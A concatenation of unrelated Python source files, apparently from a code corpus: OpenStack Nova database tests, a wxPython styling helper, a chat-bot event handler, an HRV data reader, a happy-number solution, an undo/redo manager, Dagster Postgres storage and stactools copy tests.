def test_pci_device_get_by_addr_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_by_addr,
self.context, 1, '0000:0f:08.7')
def test_pci_device_get_by_id(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_id(self.admin_context, 3353)
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_id_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFoundById,
db.pci_device_get_by_id,
self.admin_context, 3354)
def test_pci_device_get_by_id_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_by_id,
self.context, 3553)
def test_pci_device_get_all_by_node(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_all_by_node_empty(self):
v1, v2 = self._get_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 9)
self.assertEqual(len(results), 0)
def test_pci_device_get_all_by_node_low_priv(self):
self._create_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_get_all_by_node,
self.context, 1)
def test_pci_device_get_by_instance_uuid(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_by_instance_uuid_check_status(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
def test_pci_device_update(self):
v1, v2 = self._get_fake_pci_devs()
v1['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
v1['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_update_low_priv(self):
v1, v2 = self._get_fake_pci_devs()
self.assertRaises(exception.AdminRequired,
db.pci_device_update, self.context,
v1['compute_node_id'], v1['address'], v1)
def test_pci_device_destroy(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
db.pci_device_destroy(self.admin_context, v1['compute_node_id'],
v1['address'])
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v2], self.ignored_keys)
def test_pci_device_destroy_exception(self):
v1, v2 = self._get_fake_pci_devs()
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_destroy,
self.admin_context,
v2['compute_node_id'],
v2['address'])
class RetryOnDeadlockTestCase(test.TestCase):
def test_without_deadlock(self):
@sqlalchemy_api._retry_on_deadlock
def call_api(*args, **kwargs):
return True
self.assertTrue(call_api())
def test_raise_deadlock(self):
self.attempts = 2
@sqlalchemy_api._retry_on_deadlock
def call_api(*args, **kwargs):
while self.attempts:
self.attempts = self.attempts - 1
raise db_exc.DBDeadlock("fake exception")
return True
self.assertTrue(call_api())
class TestSqlalchemyTypesRepr(test_base.DbTestCase):
def setUp(self):
super(TestSqlalchemyTypesRepr, self).setUp()
meta = MetaData(bind=self.engine)
self.table = Table(
'cidr_tbl',
meta,
Column('id', Integer, primary_key=True),
Column('addr', col_types.CIDR())
)
self.table.create()
self.addCleanup(meta.drop_all)
def test_cidr_repr(self):
addrs = [('192.168.3.0/24', '192.168.3.0/24'),
('2001:db8::/64', '2001:db8::/64'),
('192.168.3.0', '192.168.3.0/32'),
('2001:db8::', '2001:db8::/128'),
(None, None)]
with self.engine.begin() as conn:
for i in addrs:
conn.execute(self.table.insert(), {'addr': i[0]})
query = self.table.select().order_by(self.table.c.id)
result = conn.execute(query)
for idx, row in enumerate(result):
self.assertEqual(addrs[idx][1], row.addr)
class TestMySQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.MySQLOpportunisticTestCase):
pass
class TestPostgreSQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.PostgreSQLOpportunisticTestCase):
pass
class TestDBInstanceTags(test.TestCase):
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'}
}
def setUp(self):
super(TestDBInstanceTags, self).setUp()
self.user_id = 'user1'
self.project_id = 'project1'
self.context = context.RequestContext(self.user_id, self.project_id)
def _create_instance(self):
inst = db.instance_create(self.context, self.sample_data)
return inst['uuid']
def _get_tags_from_resp(self, tag_refs):
return [(t.resource_id, t.tag) for t in tag_refs]
def test_instance_tag_add(self):
uuid = self._create_instance()
tag = 'tag'
tag_ref = db.instance_tag_add(self.context, uuid, tag)
self.assertEqual(uuid, tag_ref.resource_id)
self.assertEqual(tag, tag_ref.tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_add_duplication(self):
uuid = self._create_instance()
tag = 'tag'
for x in xrange(5):
db.instance_tag_add(self.context, uuid, tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the only one tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_set(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
tag4 = 'tag4'
# Set tags to the instance
db.instance_tag_set(self.context, uuid, [tag1, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were set
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
self.assertEqual(expected, tags)
# Set new tags to the instance
db.instance_tag_set(self.context, uuid, [tag3, tag4, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were replaced
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag3), (uuid, tag4), (uuid, tag2)]
self.assertEqual(set(expected), set(tags))
def test_instance_tag_get_by_instance_uuid(self):
uuid1 = self._create_instance()
uuid2 = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
db.instance_tag_add(self.context, uuid1, tag1)
db.instance_tag_add(self.context, uuid2, tag1)
db.instance_tag_add(self.context, uuid2, tag2)
db.instance_tag_add(self.context, uuid2, tag3)
# Check the tags for the first instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid1)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid1, tag1)]
self.assertEqual(expected, tags)
# Check the tags for the second instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid2)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid2, tag1), (uuid2, tag2), (uuid2, tag3)]
self.assertEqual(expected, tags)
def test_instance_tag_get_by_instance_uuid_no_tags(self):
uuid = self._create_instance()
self.assertEqual([], db.instance_tag_get_by_instance_uuid(self.context,
uuid))
def test_instance_tag_delete(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete(self.context, uuid, tag1)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag2)]
self.assertEqual(expected, tags)
def test_instance_tag_delete_non_existent(self):
uuid = self._create_instance()
self.assertRaises(exception.InstanceTagNotFound,
db.instance_tag_delete, self.context, uuid, 'tag')
def test_instance_tag_delete_all(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete_all(self.context, uuid)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([], tags)
def test_instance_tag_add_to_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_add,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_set_to_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_set,
self.context, 'fake_uuid', ['tag1', 'tag2'])
def test_instance_tag_get_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_get_by_instance_uuid, self.context,
'fake_uuid')
def test_instance_tag_delete_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound, db.instance_tag_delete,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_delete_all_from_non_existing_instance(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_delete_all,
self.context, 'fake_uuid')
|
py | b4002a8f080dde9dd50cadcab098e0293699a3dc | # -*- coding: utf-8 -*-
import tinycss as tcss
from collections import namedtuple
def SetControlStyleSheet(wxCtrl, style):
"""
Apply CSS style to wxCtrl object
wxCtrl: wxPython control
A wxPython control
style: ``str``
A string with CSS style, like: ``#self{property: value}``, where
``#self`` can be any string, because currently specific selectors
are not supported.
"""
parsed = parse_stylesheet(style)
properties = {"background-color": _SetBackgroundColor,
"font-size": _SetFontSize,
"font-family": _SetFontFaceName,
"color": _SetForegroundColor}
for prop,val in parsed.items():
if prop in properties:
properties[prop](wxCtrl,val)
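# A minimal usage sketch (hypothetical `parent` and `btn` objects; the "#self"
# selector text is arbitrary because specific selectors are not interpreted):
#
#     btn = wx.Button(parent, -1, "OK")
#     SetControlStyleSheet(btn, "#self{background-color: #222222; color: #eeeeee;}")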
def parse_stylesheet(src):
"""
Parse a stylesheet using tinycss
src : ``str``
A string like: ``"#self{property: value}"``
"""
propfuns = {"background-color":get_background,
"font-size":get_font_size,
"font-family": get_font_family,
"color": get_foreground}
props = {}
css = tcss.CSSPage3Parser()
sheet = css.parse_stylesheet(src)
for rule in sheet.rules:
for decl in rule.declarations:
if decl.name in propfuns:
                    props[decl.name] = propfuns[decl.name](decl.value[0].value)
return props
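# Rough sketch of the returned shape (exact values depend on how tinycss
# tokenises each declaration):
#
#     parse_stylesheet("#self{font-size: 20px; color: #fafa77;}")
#     # -> {"font-size": <parsed size>, "color": <parsed colour>}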
# ========================= get_property functions ==================
def get_background(prop):
"""
Background Color property
"""
return prop
def get_font_size(prop):
"""
Font size property
"""
return prop
def get_font_family(prop):
"""
Font family property
"""
return prop
def get_foreground(prop):
"""
Foreground Color property
"""
return prop
# ===================== _Set* functions ======================
def _SetFontSize(ctrl,size):
"""
Set the FontSize for a control
"""
cfont = ctrl.GetFont()
cfont.SetPointSize(size)
ctrl.SetFont(cfont)
def _SetFontFaceName(ctrl,name):
"""
Set the font name
Parameters
----------
ctrl: wxPython control
A wxPython control
name: str
A font name, i.e. "Arial", "Courier New"
"""
cfont = ctrl.GetFont()
cfont.SetFaceName(name)
ctrl.SetFont(cfont)
def _SetBackgroundColor(ctrl,color):
"""
Set the background color
Parameters
----------
ctrl : wxPython control
A wxPython control
color : str, wx.Color
A string or wx.Color class
"""
ctrl.SetBackgroundColour(color)
def _SetForegroundColor(ctrl,color):
"""
    Set the foreground color
Parameters
----------
ctrl : wxPython control
A wxPython control
color : str, wx.Color
A string or wx.Color class
"""
ctrl.SetForegroundColour(color)
# ========================== Themes ================================
def SetTheme(container, theme):
prop = namedtuple('Properties','container_color,control_color')
black = prop("#101010","#595959")
white = prop("#dadada","#f0f0f0")
blue = prop("#7777dd","#aaaaff")
if "black" in theme:
container.SetBackgroundColour(black.container_color)
_recursive_theme(container.GetChildren(), black)
elif "blue" in theme:
container.SetBackgroundColour(blue.container_color)
_recursive_theme(container.GetChildren(), blue)
else:
container.SetBackgroundColour(white.container_color)
_recursive_theme(container.GetChildren(), white)
def _recursive_theme(children, props):
    for child in children:
        print(child.__class__)
        if child.__class__.__name__ in ["Panel", "Frame"]:
            # Containers get the container colour and are themed recursively
            child.SetBackgroundColour(props.container_color)
            child.Refresh()
            _recursive_theme(child.GetChildren(), props)
        else:  # Otherwise apply the control colour
            child.SetBackgroundColour(props.control_color)
            child.Refresh()
# ============================ Tests functions =====================
def test():
import wx
app = wx.App()
fr = wx.Frame(None, -1, "This")
sz = wx.BoxSizer(wx.VERTICAL)
bt = wx.Button(fr, -1, "Button")
lb = wx.StaticText(fr, -1, "Label")
txt = wx.TextCtrl(fr, -1, "Editable")
SetControlStyleSheet(fr, "#self{background-color: #585858;}")
# Add controls
sz.Add(bt, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(lb, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(txt, 1, wx.EXPAND|wx.ALL, 2)
# Styles
btstyle = "#self{color: #e0e0e0;}"
lbstyle = "#self{background-color: #052205; color: #fafa77;}"
txtstyle = "#self{font-size: 20px;}"
SetControlStyleSheet(bt, btstyle)
SetControlStyleSheet(lb, lbstyle)
SetControlStyleSheet(txt, txtstyle)
fr.SetSizer(sz)
fr.Centre()
fr.Show()
app.MainLoop()
def test_theme():
import wx
app = wx.App()
fr = wx.Frame(None, -1, "This")
sz = wx.BoxSizer(wx.VERTICAL)
bt = wx.Button(fr, -1, "Button")
lb = wx.StaticText(fr, -1, "Label")
txt = wx.TextCtrl(fr, -1, "Editable")
# Add controls
sz.Add(bt, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(lb, 1, wx.EXPAND|wx.ALL, 2)
sz.Add(txt, 1, wx.EXPAND|wx.ALL, 2)
SetTheme(fr, "blue")
fr.SetSizer(sz)
fr.Centre()
fr.Show()
app.MainLoop()
if __name__=='__main__':
test_theme()
|
py | b4002b2597533bd51931a2dc2bd8ee97915de947 | JSON_PLACEHOLDER_API_HOST = "jsonplaceholder.typicode.com"
JP_USERS_ENDPOINT = "/users"
|
py | b4002b518d01da13c0fbe3b8194ca804962cb97c | # Copyright (c) 2021-2022, Ethan Henderson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import annotations
import asyncio
import logging
import traceback
import typing as t
from collections import defaultdict
from collections.abc import Awaitable
from dataclasses import dataclass
from chatto.errors import NoEventQueue
from chatto.message import Message
from chatto.secrets import Secrets
from chatto.stream import Stream
log = logging.getLogger(__name__)
@dataclass(eq=True, frozen=True)
class Event:
"""The base dataclass for all events."""
def __str__(self) -> str:
return self.__class__.__name__
@dataclass(eq=True, frozen=True)
class ReadyEvent(Event):
"""Event dispatched once the bot is ready to start receiving
messages."""
@dataclass(eq=True, frozen=True)
class MessageCreatedEvent(Event):
"""Event dispatched when a message has been sent to the live
chat by a user."""
message: Message
"""The received message."""
@dataclass(eq=True, frozen=True)
class StreamFetchedEvent(Event):
"""Event dispatched when stream information has been fetched."""
stream: Stream
"""The stream for which information has been fetched for."""
@dataclass(eq=True, frozen=True)
class ChatPolledEvent(Event):
"""Event dispatched when the YouTube live chat is polled."""
data: dict[str, t.Any]
"""The data received from the poll."""
@dataclass(eq=True, frozen=True)
class MessageSentEvent(Event):
"""Event dispatched when a message has been sent to the live
chat by the bot."""
message: Message
"""The sent message."""
@dataclass(eq=True, frozen=True)
class AuthorisedEvent(Event):
"""Event dispatched once the bot has been authorised with
OAuth 2."""
secrets: Secrets
"""The secrets data."""
tokens: dict[str, t.Any]
"""The OAuth tokens."""
if t.TYPE_CHECKING:
CallbacksT = dict[t.Type[Event], list[t.Callable[[Event], Awaitable[t.Any]]]]
ListenerT = t.Callable[[t.Callable[[t.Any], t.Any]], None]
class EventHandler:
"""A class that can be attached to the bot to handle events."""
__slots__ = ("_queue", "callbacks")
def __init__(self) -> None:
self.callbacks: CallbacksT = defaultdict(list)
"""A mapping of events to their respective callbacks."""
@property
def queue(self) -> asyncio.Queue[Event] | None:
"""The event queue the bot is using. If the event queue has not
been created, this will be `None`."""
return getattr(self, "_queue", None)
@property
def queue_size(self) -> int:
"""The size of the event queue. If the event queue has not been
created, this will be 0."""
if not self.queue:
return 0
return self._queue.qsize()
async def create_queue(self) -> None:
"""Create the event queue. This is handled for you."""
if self.queue:
log.warning("The event handler already has an event queue")
self._queue: asyncio.Queue[Event] = asyncio.Queue()
async def process(self) -> None:
"""A forever-looping task that processes events once they are
pushed onto the queue."""
if not self.queue:
raise NoEventQueue("there is no event queue")
while True:
try:
event = await self._queue.get()
log.debug(f"Retrieved {event} event")
for cb in self.callbacks[event.__class__]:
log.debug(f"Running callback '{cb.__name__}' for event...")
await cb(event)
except Exception:
log.error(f"Ignoring error processing {event} event:")
traceback.print_exc()
async def dispatch(self, event_type: t.Type[Event], *args: t.Any) -> Event:
"""Dispatch an event. This puts the event on the event queue.
## Arguments
* `event_type` -
The event type to put on the queue. This **must** be a
subclass of `Event`.
* `*args` -
A series of arguments to be passed to the event callback
when called.
## Returns
The event instance.
## Raises
`NoEventQueue` -
The event queue has not been created.
"""
if not self.queue:
raise NoEventQueue("there is no event queue")
event = event_type(*args)
await self._queue.put(event)
log.debug(f"Dispatched {event_type.__name__} event")
return event
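    # Dispatch sketch (assumes `handler` is an EventHandler whose queue has
    # been created, and `message` is a chatto Message instance):
    #
    #     await handler.dispatch(MessageSentEvent, message)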
def subscribe(
self, event_type: t.Type[Event], *callbacks: t.Callable[[t.Any], t.Any]
) -> None:
"""Subscribe callbacks to an event.
## Arguments
* `event_type` -
The event type to subscribe the callback to. This **must**
be a subclass of `Event`.
* `*callbacks` -
A series of callbacks to subscribe to the event.
## Raises
`NoEventQueue` -
The event queue has not been created.
"""
for cb in callbacks:
self.callbacks[event_type].append(cb)
log.info(
f"Subscribed to {event_type.__name__} events "
f"with callback '{cb.__name__}'"
)
def listen(self, event_type: type[Event]) -> ListenerT:
"""A decorator used to subscribe the wrapped callback to an
event.
## Arguments
* `event_type` -
The event type to subscribe to. This **must** be a subclass
of `events.Event`.
## Example
```py
@bot.events.listen(events.StreamFetchedEvent)
async def on_stream_fetched(event):
print(f"Fetched stream with ID: {event.stream.id}")
```
"""
return lambda callback: self.subscribe(event_type, callback)
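# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, self-contained wiring of the pieces defined above: create the
# queue, subscribe a callback, run the processor, dispatch one event, stop.
# The surrounding bot normally does all of this for you.
if __name__ == "__main__":
    async def _demo() -> None:
        handler = EventHandler()
        await handler.create_queue()
        async def on_poll(event: ChatPolledEvent) -> None:
            # Called by process() when a ChatPolledEvent is pulled off the queue.
            print(f"Polled data with {len(event.data)} top-level keys")
        handler.subscribe(ChatPolledEvent, on_poll)
        processor = asyncio.create_task(handler.process())
        await handler.dispatch(ChatPolledEvent, {"items": []})
        await asyncio.sleep(0.1)  # give the processor a chance to run the callback
        processor.cancel()
    asyncio.run(_demo())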
|
py | b4002baed302a739b9b7c52c3d85668127eceba2 | """Class to import HRV RRI data in text format.
"""
from logging import getLogger
from numpy import arange, cumsum, empty, float64, interp, newaxis
from scipy.interpolate import splev, splrep
from datetime import datetime, timedelta
from .utils import DEFAULT_DATETIME
lg = getLogger(__name__)
class LyonRRI:
"""Class to read text format RR interval data from HRVanalysis export
(INSERM/Lyon). Returns one channel only.
Parameters
----------
rec_dir : path to record directory
the folder containing the record
Notes
-----
With code adapted from Rhenan Bartels: https://github.com/rhenanbartels/hrv
"""
def __init__(self, rec_dir):
lg.info('Reading ' + str(rec_dir))
self.filename = rec_dir
self.s_freq = None
self.hdr = self.return_hdr()
self.dig_min = 0
self.dig_max = 3000
self.phys_min = 0
self.phys_max = 3000
self.rri = self.return_rri(0, self.hdr[4])
self.time = self.create_time(self.rri)
self.time_interp = None
self.rri_interp = None
def return_hdr(self):
"""Return the header for further use.
Returns
-------
subj_id : str
subject identification code
start_time : datetime
start time of the dataset
s_freq : float
sampling frequency
chan_name : list of str
list of all the channels
n_samples : int
number of samples in the dataset
orig : dict
the full header
"""
hdr = {}
hdr['s_freq'] = self.s_freq
hdr['chan_name'] = ['RRi']
with open(self.filename, 'rt') as f:
head = [next(f) for x in range(12)]
hdr['subj_id'] = head[0][11:-3]
hdr['start_time'] = DEFAULT_DATETIME
hdr['recorder'] = head[2][10:]
hdr['s_freq_ecg'] = int(head[3][4:]) # ECG sampling frequency
t = datetime.strptime(head[4][16:24], '%H:%M:%S')
hdr['total_dur'] = timedelta(hours=t.hour, minutes=t.minute,
seconds=t.second)
hdr['export_date'] = DEFAULT_DATETIME
hdr['data_type'] = head[10][11:]
for i, _ in enumerate(f):
pass
hdr['n_samples'] = i
output = (hdr['subj_id'], hdr['start_time'], hdr['s_freq'],
hdr['chan_name'], hdr['n_samples'], hdr)
return output
def return_dat(self, chan, begsam, endsam):
if self.rri_interp is None:
raise ValueError('RRi has not been interpolated.')
return self.rri_interp[newaxis, begsam:endsam]
def return_markers(self):
"""There are no markers in this format.
"""
return []
def create_time(self, rri):
time = (cumsum(rri) / 1000.0)
return time - time[0]
def return_rri(self, begsam, endsam):
"""Return raw, irregularly-timed RRI."""
interval = endsam - begsam
dat = empty(interval)
k = 0
with open(self.filename, 'rt') as f:
[next(f) for x in range(12)]
for j, datum in enumerate(f):
if begsam <= j < endsam:
dat[k] = float64(datum[:datum.index('\t')])
k += 1
if k == interval:
break
return dat
def interpolate(self, s_freq=4, interp_method='cubic'):
rri = self.rri
irregular_time = self.time
step = 1 / float(s_freq)
regular_time = arange(0, irregular_time[-1] + step, step)
        if interp_method == 'cubic':
            tck = splrep(irregular_time, rri, s=0)
            rri_interp = splev(regular_time, tck, der=0)
        elif interp_method == 'linear':
            rri_interp = interp(regular_time, irregular_time, rri)
        else:
            raise ValueError("interp_method must be 'cubic' or 'linear'")
self.time_interp = regular_time
self.rri_interp = rri_interp
self.s_freq = s_freq
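# --- Illustrative usage sketch (hypothetical file path) ---
# 'rri_export.txt' stands in for a real HRVanalysis text export; return_dat()
# only yields data after interpolate() has produced a regularly sampled series.
#
#     reader = LyonRRI('rri_export.txt')
#     reader.interpolate(s_freq=4, interp_method='cubic')
#     first_minute = reader.return_dat(0, 0, 4 * 60)   # channel 0, first 60 s at 4 Hz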
|
py | b4002d3e1777721a90b488391eb7649eb90ca45f |
class Box:
pass
|
py | b4002de7eff9d788b1bab41ebae70a00cedae7d6 | """
Write an algorithm to determine if a number is "happy".
A happy number is a number defined by the following process: Starting with any positive integer, replace the number by
the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it
loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers.
Example: 19 is a happy number
1^2 + 9^2 = 82
8^2 + 2^2 = 68
6^2 + 8^2 = 100
1^2 + 0^2 + 0^2 = 1
"""
__author__ = 'Daniel'
class Solution:
def isHappy(self, n):
"""
Start with several simple cases and find the pattern.
:param n:
:rtype: bool
"""
nxt = 0
appeared = set()
while True:
nxt += (n%10)*(n%10)
            n //= 10  # integer division, so the digit loop also works under Python 3
if n == 0:
if nxt == 1:
return True
if nxt in appeared:
return False
appeared.add(nxt)
n = nxt
nxt = 0
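if __name__ == '__main__':
    # Illustrative self-check (not in the original): 19 is happy, 4 falls into
    # the 4 -> 16 -> 37 -> 58 -> 89 -> 145 -> 42 -> 20 -> 4 cycle.
    assert Solution().isHappy(19) is True
    assert Solution().isHappy(4) is False
    print("isHappy checks passed")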
|
py | b4002eb31a1fb9881894990bfa58323c0a57b6f5 | from __future__ import annotations
from api.data_structures import Stack
from api.operation import Operation
class HistoryManager:
def __init__(self):
self.undo_stack: Stack[Operation] = Stack()
self.redo_stack: Stack[Operation] = Stack()
def add_operation(self, operation_instance: Operation):
self.undo_stack.append(operation_instance)
def undo(self) -> Operation:
operation_to_undo = self.undo_stack.pop()
self.redo_stack.append(operation_to_undo)
return operation_to_undo
def redo(self) -> Operation:
operation_to_redo = self.redo_stack.pop()
self.undo_stack.append(operation_to_redo)
return operation_to_redo
    def __contains__(self, item):
        if isinstance(item, Operation):
            return item in self.undo_stack
        return False
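# --- Illustrative usage sketch (op is whatever Operation subclass the app defines) ---
#
#     history = HistoryManager()
#     history.add_operation(op)   # push op onto the undo stack
#     history.undo()              # pop op and park it on the redo stack
#     history.redo()              # move op back onto the undo stack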
|
py | b4002f0053fad4992bcf84b4a942ed7e3d075f04 | from contextlib import contextmanager
import sqlalchemy as db
from dagster import check
from dagster.core.serdes import ConfigurableClass, ConfigurableClassData
from dagster.core.storage.runs import RunStorageSqlMetadata, SqlRunStorage
from dagster.core.storage.sql import create_engine, get_alembic_config, run_alembic_upgrade
from ..utils import pg_config, pg_url_from_config
class PostgresRunStorage(SqlRunStorage, ConfigurableClass):
def __init__(self, postgres_url, inst_data=None):
self.postgres_url = postgres_url
with self.get_engine() as engine:
RunStorageSqlMetadata.create_all(engine)
self._inst_data = check.opt_inst_param(inst_data, 'inst_data', ConfigurableClassData)
@contextmanager
def get_engine(self):
engine = create_engine(
self.postgres_url, isolation_level='AUTOCOMMIT', poolclass=db.pool.NullPool
)
try:
yield engine
finally:
engine.dispose()
@property
def inst_data(self):
return self._inst_data
@classmethod
def config_type(cls):
return pg_config()
@staticmethod
def from_config_value(inst_data, config_value):
return PostgresRunStorage(
inst_data=inst_data, postgres_url=pg_url_from_config(config_value)
)
@staticmethod
def create_clean_storage(postgres_url):
engine = create_engine(
postgres_url, isolation_level='AUTOCOMMIT', poolclass=db.pool.NullPool
)
try:
RunStorageSqlMetadata.drop_all(engine)
finally:
engine.dispose()
return PostgresRunStorage(postgres_url)
@contextmanager
def connect(self, _run_id=None): # pylint: disable=arguments-differ
with self.get_engine() as engine:
yield engine
def upgrade(self):
alembic_config = get_alembic_config(__file__)
with self.get_engine() as engine:
run_alembic_upgrade(alembic_config, engine)
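# --- Illustrative usage sketch (connection URL is hypothetical) ---
#
#     storage = PostgresRunStorage('postgresql://user:password@localhost:5432/dagster')
#     storage.upgrade()                  # apply alembic migrations
#     with storage.connect() as engine:
#         ...                            # SqlRunStorage queries run against this engine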
|
py | b4002fbe0ad372fe23402930dfe09fce27b1248a | import os
from tempfile import TemporaryDirectory
from typing import cast
import pystac
from pystac.utils import is_absolute_href, make_absolute_href
from stactools.cli.commands.copy import create_copy_command, create_move_assets_command
from stactools.testing import CliTestCase
from .test_cases import TestCases
class CopyTest(CliTestCase):
def create_subcommand_functions(self):
return [create_copy_command, create_move_assets_command]
def test_copy(self):
cat = TestCases.planet_disaster()
item_ids = set([i.id for i in cat.get_all_items()])
with TemporaryDirectory() as tmp_dir:
self.run_command(['copy', cat.get_self_href(), tmp_dir])
copy_cat = pystac.read_file(
os.path.join(tmp_dir, 'collection.json'))
copy_cat_ids = set([i.id for i in copy_cat.get_all_items()])
self.assertEqual(copy_cat_ids, item_ids)
def test_copy_to_relative(self):
cat = TestCases.planet_disaster()
with TemporaryDirectory() as tmp_dir:
cat.make_all_asset_hrefs_absolute()
cat.normalize_hrefs(tmp_dir)
cat.save(catalog_type=pystac.CatalogType.ABSOLUTE_PUBLISHED)
